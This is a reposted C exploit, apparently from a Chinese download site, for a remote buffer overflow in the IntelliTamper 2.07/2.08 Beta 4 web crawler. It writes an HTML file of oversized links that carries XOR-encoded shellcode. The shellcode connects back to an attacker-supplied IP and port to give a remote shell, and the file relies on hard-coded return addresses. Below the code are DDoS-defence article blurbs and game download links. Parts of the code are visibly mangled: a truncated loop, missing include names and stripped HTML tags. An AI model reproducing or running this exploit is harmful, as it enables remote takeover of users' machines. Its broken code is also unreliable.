当前位置: 首页
网络安全
IntelliTamper 2.07/2.08 Beta 4 A HREF 远程缓冲区溢出漏洞利用

IntelliTamper 2.07/2.08 Beta 4 A HREF 远程缓冲区溢出漏洞利用

时间:2026-07-28
转载

******************************************************************** * [Crpt] IntelliTamper v2 07 2 08 Beta 4 远程缓冲区溢出漏洞利用代码 by kralor [Crpt] * **

/********************************************************************/
/* [Crpt]  IntelliTamper v2.07/2.08 Beta 4 远程缓冲区溢出漏洞利用代码 by kralor [Crpt] */
/********************************************************************/
/*                             IntelliTamper Exploit                */
/* 本漏洞利用代码已在特定环境下测试通过,成功率为100%               */
/* 适用于目标系统版本 v2.07 和 v2.08 Beta 4                        */
/* 注意:利用代码涉及缓冲区溢出攻击技术,仅供安全研究使用           */
/* 请勿用于非法用途                                                */
/********************************************************************/
/* 漏洞利用代码已在 Jef_FR 的测试环境中验证通过,成功率达到100% :) */
/* Jef_FR 本人可作见证,此利用代码有效 :P                           */
/* 该利用代码具有通用性,当目标运行 v2.08 Beta 4 时,系统会启用    */
/* SEH 保护机制。然而,针对 v2.07 设计的第一个链接(体积更小)     */
/* 不会引发程序崩溃,而是由程序自身的异常处理程序接管。总而言之,   */
/* 我们还可以直接跳转到 0x00F1FFDC,而无需事先寻找 jmp ebx。       */
/* 经过测试,在两种版本崩溃后(即使程序有 SEH 也能捕获异常),     */
/* ebx 寄存器始终指向同一个偏移量(大约在缓冲区末尾)。             */
/* 我没有在其他平台上进行测试,因为已有可用的 jmp ebx 返回地址。    */
/* 以上就是全部内容,请各位安全研究人员享用。                       */
/*                                                                  */
/* 附注:请注意,你的 IP 地址经过 0x98 异或处理后,不能产生坏操作码 */
/* 例如 < > " \r \n 等。编写起来并不困难 :)                      */
/********************************************************************/
/* 更多信息请访问 www.coromputer.net, IRC 频道 #coromputer          */
/********************************************************************/
#include 
#include 
#include 
#ifdef _WIN32
#include 
#pragma comment(lib, "ws2_32")
#else
#include 
#endif
#define SIZEOF   14448                 /* 适用于 IntelliTamper v2.08 Beta 4 及 v2.07 版本
                                        * 对于 v2.07,尺寸不是这个值,因为
                                        * RET_ADDR2 处会*少*一段,
                                        * 所以实际尺寸会减小。
                                        */
#define SCOFFSET 10000                 /* IntelliTamper v2.08 Beta 4 偏移量 */
#define RET_POS  SIZEOF-4
#define RET_ADDR 0x004368C4
#define SCOFFSET2 100                  /* IntelliTamper v2.07 偏移量 */
#define RET_POS2  6832
#define RET_ADDR2 0x00437224
#define u_short unsigned short
#define u_char  unsigned char
#define HOP 0xd9 /* 主机操作码 */
#define POP 0xda /* 端口操作码 */
#define BEGIN "hi\r\n\r\n"
#define END   "\r\n"

int set_sc(char *host,unsigned long port, char *sc)
{
  unsigned long ip,p;
  unsigned int i;
  ip=inet_addr(host)^0x98989898;
  p=htons((u_short)port);
  p=p<<16;
  p =0x0002;
  p=p^0x98989898;
for(i=0;i  \n",prog);
  exit(0);
}

void banner(void)
{
  printf("\n\t[Crpt] IntelliTamper v2.07/2.08 Beta 4 sploit by kralor [Crpt]\n");
  printf("\t\t  www.coromputer.net && undernet #coromputer\n\n");
  return;
}

int main(int argc, char *argv[])
{
  char buffer[SIZEOF];
  unsigned long port;
  FILE *file;
  char shellc0de[] =   /* sizeof(shellc0de xorer) == 334 bytes */
  /* 经典异或解码器 */
  /* "\xcc" */
  "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
  "\xb9\x3f\x01\x80\x33\x98\x43\xe2\xfa"
  /* Shellcode 主体 */
  "\x19\x5c\x50\x98\x98\x98\x13\x74\x13\x6c\xcd\xce\xfc\x39\xa8\x98"
  "\x98\x98\x13\xd8\x94\x13\xe8\x84\x35\x13\xf0\x90\x73\x98\x13\x5d"
  "\xc6\xc5\x11\x9e\x67\xae\xf0\x16\xd6\x96\x74\x70\x35\x98\x98\x98"
  "\xf0\xab\xaa\x98\x98\xf0\xef\xeb\xaa\xc7\xcc\x67\x48\x13\x60\xcf"
  "\xf0\x41\x91\x6d\x35\x70\x0b\x98\x98\x98\xab\x51\xc9\xc9\xc9\xc9"
  "\xd9\xc9\xd9\xc9\x67\x48\x11\xde\xbc\xcf\xf0\x74\x61\x32\xf8\x70"
  "\xe1\x98\x98\x98\xf0\xd9\xd9\xd9\xd9\xf0\xda\xda\xda\xda\x13\x54"
  "\xf2\x88\xc9\x67\xee\xbc\x67\x48\xf0\xfb\xf5\xfc\x98\x11\xfe\xa8"
  "\x67\xae\xf0\xea\x66\x2b\x8e\x70\xc9\x98\x98\x98\x11\xde\x86\x1b"
  "\x74\xcc\x15\xa4\xbc\xab\x58\xab\x51\x1b\x59\x8d\x33\x7a\x65\x5e"
  "\xdc\xbc\x88\xdc\x66\xdc\xbc\xa5\x66\xdc\xbc\xa4\x13\xde\xbc\x11"
  "\xdc\xbc\xd0\x11\xdc\xbc\xd4\x11\xdc\xbc\xc8\x15\xdc\xbc\x88\xcc"
  "\xc8\xc9\xc9\xc9\xf2\x99\xc9\xc9\x67\xee\xa8\xc9\x67\xce\x86\x67"
  "\xae\xf0\x77\x56\x78\xf8\x70\x9a\x98\x98\x98\x67\x48\xcb\xcd\xce"
  "\xcf\x13\xf4\xbc\x80\x13\xdd\xa4\x13\xcc\x9d\xe0\x9b\x4d\x13\xd2"
  "\x80\x13\xc2\xb8\x9b\x45\x7b\xaa\xd1\x13\xac\x13\x9b\x6d\xab\x67"
  "\x64\xab\x58\x34\xa2\x5c\xec\x9f\x59\x57\x95\x9b\x60\x73\x6a\xa3"
  "\xe4\xbc\x8c\xed\x79\x13\xc2\xbc\x9b\x45\xfe\x13\x94\xd3\x13\xc2"
  "\x84\x9b\x45\x13\x9c\x13\x9b\x5d\x73\x9a\xab\x58\x13\x4d\xc7\xc6"
  "\xc5\xc3\x5a\x9c\x98";

  banner();
  if(argc!=4)
    syntax(argv[0]);

  port=atoi(argv[3]);
  if(port<=0||port>65535) {
    printf("error:  must be between 1 and 65535\r\n");
    return -1;
  }

  printf("[S] ip: %s port: %d file: %s\r\n",argv[2],port,argv[1]);
  printf("[C] Setting universal shellcode ...");
  if(set_sc(argv[2],port,shellc0de))
    return -1;
  printf("DONE\r\n");

  file=fopen(argv[1],"w");
  if(!file) {
    printf("error: unable to open %s\r\n",argv[1]);
    return -1;
  }

  printf("[C] Writing magic link for Intellitamper v2.07 ...");
  fprintf(file,BEGIN);
  fprintf(file,"sex drugs and rock'n'roll
\r\n"); memset(buffer,0x90,sizeof(buffer)); *(unsigned long*)&buffer[RET_POS2] = RET_ADDR2; memcpy(buffer+SCOFFSET2,shellc0de,sizeof(shellc0de)-1); memcpy(buffer+6836-8,"\xEB\xE0",2); /* 跳转指令:回退0x10字节 */ memcpy(buffer+6836-16,"\xE9\x8F\xE5\xFF\xFF",5); /* 跳转指令:回退指定偏移 */ fprintf(file,"sexy bitch
\r\n"); printf("DONE\r\n"); printf("[C] Writing magic link for Intellitamper v2.08 Beta 4 ..."); memset(buffer,0x90,sizeof(buffer)); *(unsigned long*)&buffer[RET_POS] = RET_ADDR; memcpy(buffer+SCOFFSET,shellc0de,sizeof(shellc0de)-1); memcpy(buffer+SIZEOF-8,"\xEB\xE0",2); /* 跳转指令:回退0x10字节 */ memcpy(buffer+SIZEOF-16,"\xE9\x8F\xEB\xFF\xFF",5); /* 跳转指令:回退指定偏移 */ fprintf(file,"not sexy bitch
\r\n"); printf("DONE\r\n"); fprintf(file,END); fclose(file); printf("[C] All job done\r\n"); return 0; }

游乐网为非赢利性网站,所展示的游戏/软件/文章内容均来自于互联网或第三方用户上传分享,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系youleyoucom@outlook.com。

同类文章
更多
DDoS攻击的三大主要形式:原理、特征与防御重点

DDoS攻击的三大主要形式:原理、特征与防御重点

DDoS攻击主要分为基于流量(Volume)、基于应用层(Application)和基于协议(Protocol)三种形式。流量型攻击通过海量数据淹没带宽;应用层攻击利用Web漏洞耗尽服务器资源;协议层攻击则利用TCP握手缺陷导致系统挂起。了解这些原理是制定针对性防御策略的基础。

时间:2026-08-31 11:56
如何有效预防和缓解DDoS攻击:5大核心策略详解

如何有效预防和缓解DDoS攻击:5大核心策略详解

面对DDoS攻击,单纯增加带宽已非长久之计。本文详解5大核心防护策略:优化网络硬件配置、建立DNS冗余机制、部署透明缓解技术、引入负载平衡器及专用Anti-DDoS模块。通过合理组合这些技术手段,可有效抵御SYN泛洪、Slowloris等常见攻击,保障业务连续性与网站可用性。

时间:2026-08-31 11:56
DDoS防护四大误区:CDN、防火墙与黑名单的局限性解析

DDoS防护四大误区:CDN、防火墙与黑名单的局限性解析

许多企业误以为CDN、防火墙或黑名单能完全抵御DDoS攻击。本文深入解析四大常见误区:CDN仅提供部分缓解、静态黑名单易失效、防火墙算力有限且可能成为目标、阈值警报仅具滞后性。了解这些局限性,有助于构建更立体的防御体系,避免在攻击发生时措手不及。

时间:2026-08-31 11:55
常见DDoS攻击类型详解:原理、特征与防御策略

常见DDoS攻击类型详解:原理、特征与防御策略

本文详细解析四种常见DDoS攻击类型:SYN Flood利用TCP三次握手缺陷耗尽资源;UDP Flood通过海量数据包造成带宽拥塞;ICMP Flood利用Ping请求消耗系统算力;应用层Flood针对Web脚本进行高频请求。了解其原理是制定有效防御策略的基础。

时间:2026-08-31 11:55
如何有效抵御DDOS攻击:4种核心防护方案解析

如何有效抵御DDOS攻击:4种核心防护方案解析

面对DDOS攻击,企业需构建多层防护体系。本文详解四大核心策略:利用反向路由器查询进行流量清洗,通过GCDN智能分配节点隐藏源站IP,部署负载均衡硬件分担压力,以及接入高防机房抵御数百G恶意流量。掌握这些技术,可最大程度保障业务连续性。

时间:2026-08-31 11:54
热门专题
更多
刀塔传奇破解版无限钻石下载大全 刀塔传奇破解版无限钻石下载大全
洛克王国正式正版手游下载安装大全 洛克王国正式正版手游下载安装大全
思美人手游下载专区 思美人手游下载专区
好玩的阿拉德之怒游戏下载合集 好玩的阿拉德之怒游戏下载合集
不思议迷宫手游下载合集 不思议迷宫手游下载合集
百宝袋汉化组游戏最新合集 百宝袋汉化组游戏最新合集
jsk游戏合集30款游戏大全 jsk游戏合集30款游戏大全
宾果消消消原版下载大全 宾果消消消原版下载大全